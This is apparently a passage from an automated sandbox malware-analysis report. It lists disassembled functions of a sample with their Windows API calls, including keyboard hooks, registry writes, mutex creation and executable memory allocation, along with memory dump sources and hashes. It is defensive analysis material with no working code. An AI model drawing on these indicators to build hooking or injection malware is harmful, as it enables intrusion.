                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 10892065-0
                                                                                  • Opcode ID: 9f6c57a02eeda8a6d62a729f5bbcf63b4f8f2fea13dffc3a840bdeac4a210950
                                                                                  • Instruction ID: 8d343f636ceb85d6dd62f1d27db5048c16a598f0cf0918006dd3063287dcdbcf
                                                                                  • Opcode Fuzzy Hash: 9f6c57a02eeda8a6d62a729f5bbcf63b4f8f2fea13dffc3a840bdeac4a210950
                                                                                  • Instruction Fuzzy Hash: 21D0A7765943449EEF10AF729C097263BECE785395F048435F90DC6140F670DD90EA00
                                                                                  Function 6A6EF452 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(6A72FA38,?), ref: 6A6EF47B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlocked
                                                                                  • String ID:
                                                                                  • API String ID: 367298776-0
                                                                                  • Opcode ID: bfdd6517c9ae51432a63bcea616d33504170b958001c0cb9f956144be696c61d
                                                                                  • Instruction ID: acfb97ccbdb1ee67215bdc52d0424b13b876a5b4813de9c63398805df94877b3
                                                                                  • Opcode Fuzzy Hash: bfdd6517c9ae51432a63bcea616d33504170b958001c0cb9f956144be696c61d
                                                                                  • Instruction Fuzzy Hash: 50E0EC35615A909FEB116B79E808A5677E5BF8D211706486AF5A2C3221DF31D8028B94
                                                                                  Function 0040BB20 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(?,0040A913,0040A913,00000000), ref: 0040BB2B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 487fcfe3ab1f74df3890a70bfc9e5a6251da3d086f6f62975b7ca4886f1dbcce
                                                                                  • Instruction ID: 149bd8c80d372bd101e0916c0c112bc2767ea3e12d892f21c22c2322e2c042e3
                                                                                  • Opcode Fuzzy Hash: 487fcfe3ab1f74df3890a70bfc9e5a6251da3d086f6f62975b7ca4886f1dbcce
                                                                                  • Instruction Fuzzy Hash: C2E04F3080020CEBDB00DF98C4557ADBB78EB00314F108299E9152B6C4D3346A558799
                                                                                  Function 00408889 Relevance: 1.5, APIs: 1, Instructions: 18registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegSetValueExA.KERNEL32(?,?,00000000,00000000,00000001,?,00000000), ref: 00408830
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID:
                                                                                  • API String ID: 3702945584-0
                                                                                  • Opcode ID: 7e6735047d8510babd66cf53b400af0a7c7aa281f67639dddace9e0d15091680
                                                                                  • Instruction ID: aca836bd7a85e2bb46a0c7949aed6867d9f4c8a4aac7c95fbf95fd193ec2e6fe
                                                                                  • Opcode Fuzzy Hash: 7e6735047d8510babd66cf53b400af0a7c7aa281f67639dddace9e0d15091680
                                                                                  • Instruction Fuzzy Hash: E1D05EB5600009AB8F04FBE5D952CBFB378EF88314B10818DF8056B141EE741E019BB2
                                                                                  Function 0040A770 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c9eb017e7881ccdb948a9224f55136e6194193180b57a00a3fe5751be508d247
                                                                                  • Instruction ID: 4bb8b93d007cd34bc8365e86b9ad9b7ed268455f2730f5ed97b8128170ca7dda
                                                                                  • Opcode Fuzzy Hash: c9eb017e7881ccdb948a9224f55136e6194193180b57a00a3fe5751be508d247
                                                                                  • Instruction Fuzzy Hash: A3D0C92055430469E6947BF25C46B2A3AB8AB01348B58883FE905A16D2FDBDD4B0852F
                                                                                  Function 0042C880 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetWindowTextA.USER32(?,?,00000000,?,?,0042D39F,0042C756,00000000,?), ref: 0042C893
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: TextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 530164218-0
                                                                                  • Opcode ID: 286f7b00bb400badcfacfeb27044020f73c37ef3ca0e04e32863a6b81f1c4f0f
                                                                                  • Instruction ID: 0969053e9503fc06eb5284dbb900658191184282fab30e001edb48610d34b587
                                                                                  • Opcode Fuzzy Hash: 286f7b00bb400badcfacfeb27044020f73c37ef3ca0e04e32863a6b81f1c4f0f
                                                                                  • Instruction Fuzzy Hash: 45D05EB160400CBB8704EF89D941C7EB3BCEBC8301B10419DB90887301CA31AE1197A4
                                                                                  Function 0044ADDB Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetWindowsHookExA.USER32(?,000000FF,Function_00049C43,00000000,?,00466E42), ref: 0044ADFF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: HookWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2559412058-0
                                                                                  • Opcode ID: b4ee69abca954f65379d9bcd6becdda948bfbfb12f0c3aa157b2e93b74e7f3b6
                                                                                  • Instruction ID: 27af79e85e09a7aa1b19f3e3bdbad7141d30e8b4ca391cd678390cc570e95836
                                                                                  • Opcode Fuzzy Hash: b4ee69abca954f65379d9bcd6becdda948bfbfb12f0c3aa157b2e93b74e7f3b6
                                                                                  • Instruction Fuzzy Hash: EED0A720CCC6506CFB5036313D07B8B24441B80329F21034BF8202E2C3955C569542DF
                                                                                  Function 00442890 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1579825452-0
                                                                                  • Opcode ID: 4dab88147019d40aa6289d60c191cf9e8d975af79d0852ed54fb642eaab7f722
                                                                                  • Instruction ID: 51d5dfc924a925811dbb632167b94e922819a1957f3aae3d89562f18d0aa2d0e
                                                                                  • Opcode Fuzzy Hash: 4dab88147019d40aa6289d60c191cf9e8d975af79d0852ed54fb642eaab7f722
                                                                                  • Instruction Fuzzy Hash: E3D017B240060DABDB08DF58C985AAE77A8BF04314F08841ABC2C4A241DA39E560CF45
                                                                                  Function 0BE97260 Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateMutexA.KERNEL32(?,?,?,?,0BEF5193,00000000,00000000,00000000,.mtx,?,xxxxxx,?,Index,0BEFFCE8,00000000,0BEF545C), ref: 0BE97276
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateMutex
                                                                                  • String ID:
                                                                                  • API String ID: 1964310414-0
                                                                                  • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                                  • Instruction ID: 46eae50369b6be1bade0a2901a11078955870ac433f135f47b4ab0a529cbf885
                                                                                  • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                                  • Instruction Fuzzy Hash: BBC0127317024CAF8B00EEA8DC05D9F33DC5B18505B008414B518C7100D139E5548B60
                                                                                  Function 00449479 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShowWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420A52,00000005), ref: 0044948A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1268545403-0
                                                                                  • Opcode ID: c9de29c50f192f93b177c3c6420cd547a5b3479b9200045b02903cd5c2817574
                                                                                  • Instruction ID: 787606718c0c3050ede8edd67cddb3edda02b8b8c79bcc5dfcf80af2b39e9fbc
                                                                                  • Opcode Fuzzy Hash: c9de29c50f192f93b177c3c6420cd547a5b3479b9200045b02903cd5c2817574
                                                                                  • Instruction Fuzzy Hash: 19D09272144648EFDB048B50E808BBA3BA5FB9832AF6140A9E5480E622C7379866DB44
                                                                                  Function 0046BD6D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fsopen
                                                                                  • String ID:
                                                                                  • API String ID: 3646066109-0
                                                                                  • Opcode ID: b5f1e3f8c0985568a2b975540194b91a49099896255c8aa19d8b1f82aed34cac
                                                                                  • Instruction ID: 02fc6e0fe4c119964e2f3369f3dd15230d4ce90c75cbdae128b96965c2990ead
                                                                                  • Opcode Fuzzy Hash: b5f1e3f8c0985568a2b975540194b91a49099896255c8aa19d8b1f82aed34cac
                                                                                  • Instruction Fuzzy Hash: 4BC0927A44020C77DF112A83EC03E4A3F1ADBC0774F048025FB1C19162AAB7EAA196CA
                                                                                  Function 0044A97C Relevance: 1.5, APIs: 1, Instructions: 9threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetThreadPriority.KERNEL32(00000000,?,00000000,?,0044B190,?,?,?,?,00000004,00409C74,Function_00008B20,00000000,00000000,00000000,00000000), ref: 0044A988
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: PriorityThread
                                                                                  • String ID:
                                                                                  • API String ID: 2383925036-0
                                                                                  • Opcode ID: ddc42a54c7d2ec11b33b444c52c82f131c2b40b377d724689d17fffdcb22b600
                                                                                  • Instruction ID: 52e9a5fcbd096cdb4dbe5613cc8ef1c47baabf37b89a3e5b7a28070516fdd0bf
                                                                                  • Opcode Fuzzy Hash: ddc42a54c7d2ec11b33b444c52c82f131c2b40b377d724689d17fffdcb22b600
                                                                                  • Instruction Fuzzy Hash: 8CB092B3000208B78A012AE29C49C8A7E1EABD97607108411F60C0A1128A33E472E6A4
                                                                                  Function 0046EB5C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __make__time64_t
                                                                                  • String ID:
                                                                                  • API String ID: 1242165881-0
                                                                                  • Opcode ID: 5f2446f3e75e43e2549ab1216d78344c9aed32879290253eb41c07f426e25a17
                                                                                  • Instruction ID: 8b079176faed591c253fe4ee6357d312a3bfbc766710cee63be3ee367cd2e735
                                                                                  • Opcode Fuzzy Hash: 5f2446f3e75e43e2549ab1216d78344c9aed32879290253eb41c07f426e25a17
                                                                                  • Instruction Fuzzy Hash: 5BB0123714834C2BD70075CFA443E8537CD8BC4B24F100016B62C0B1C2ADA3F88051DA
                                                                                  Function 6A6D18D0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateFileHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3498533004-0
                                                                                  • Opcode ID: 9055fe6a5769d55a1818a5891333d79c6588340a7f8daf1935e8e0d0dc4af59b
                                                                                  • Instruction ID: 9203a9f50baebbe4a790c827808eea32774de16e7e01f577c73b1c40d7c2c781
                                                                                  • Opcode Fuzzy Hash: 9055fe6a5769d55a1818a5891333d79c6588340a7f8daf1935e8e0d0dc4af59b
                                                                                  • Instruction Fuzzy Hash: C19004515F745F000D30153C440443C4045F05170FF411FF07453C50C5DF4040571405
                                                                                  Function 00437880 Relevance: 1.4, APIs: 1, Instructions: 151COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7101caad66fa4d895e222209a2c2a16301773b54719139c1e79e082bbc61efe0
                                                                                  • Instruction ID: ec936bb6eae5c2f2f88241aa52067fbbbc57561ed6186e3438eea2db0e72be6d
                                                                                  • Opcode Fuzzy Hash: 7101caad66fa4d895e222209a2c2a16301773b54719139c1e79e082bbc61efe0
                                                                                  • Instruction Fuzzy Hash: 76613AB4E04208DFDF14DF94C594BAEBBB1AF48314F20819ED8856B341D379AA85CF95
                                                                                  Function 6A6F2BB3 Relevance: 1.3, APIs: 1, Instructions: 71stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • lstrlenA.KERNEL32(00000000,000000FF), ref: 6A6F2BE0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 1659193697-0
                                                                                  • Opcode ID: 06e6233b281234104916c54e6e47715395ca5273628cb6e5f42c0d9ab67ec545
                                                                                  • Instruction ID: c7e701076d323f489073bec98e0c8ada23f985fe6f8281f360dbe1948dfa0ccc
                                                                                  • Opcode Fuzzy Hash: 06e6233b281234104916c54e6e47715395ca5273628cb6e5f42c0d9ab67ec545
                                                                                  • Instruction Fuzzy Hash: 25210531A04290AFCB659E78C888B4E7BA6AF46364F2149A8F411DB3D1CF34DC42CB94
                                                                                  Function 0BEB1B10 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,0BEF4C80,00000000,?,0BEB1C67,?,?,00000000,0BE90000,00000000,00000000,00000000), ref: 0BEB1B2E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 4773dab19d53a97cdc3c8a9baa9ffe833f2486c84137d28514762cc4633b5f76
                                                                                  • Instruction ID: 18921f76270e4ade18f72780206b044ff0ee671f9d8f5041ff192adf198655e7
                                                                                  • Opcode Fuzzy Hash: 4773dab19d53a97cdc3c8a9baa9ffe833f2486c84137d28514762cc4633b5f76
                                                                                  • Instruction Fuzzy Hash: 1D1188742047068FC710DF18C881F82FBE1EF887A0F20C53AE9999B384E370E9058BA5
                                                                                  Function 0BE985D0 Relevance: 1.3, APIs: 1, Instructions: 49memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004), ref: 0BE985E9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
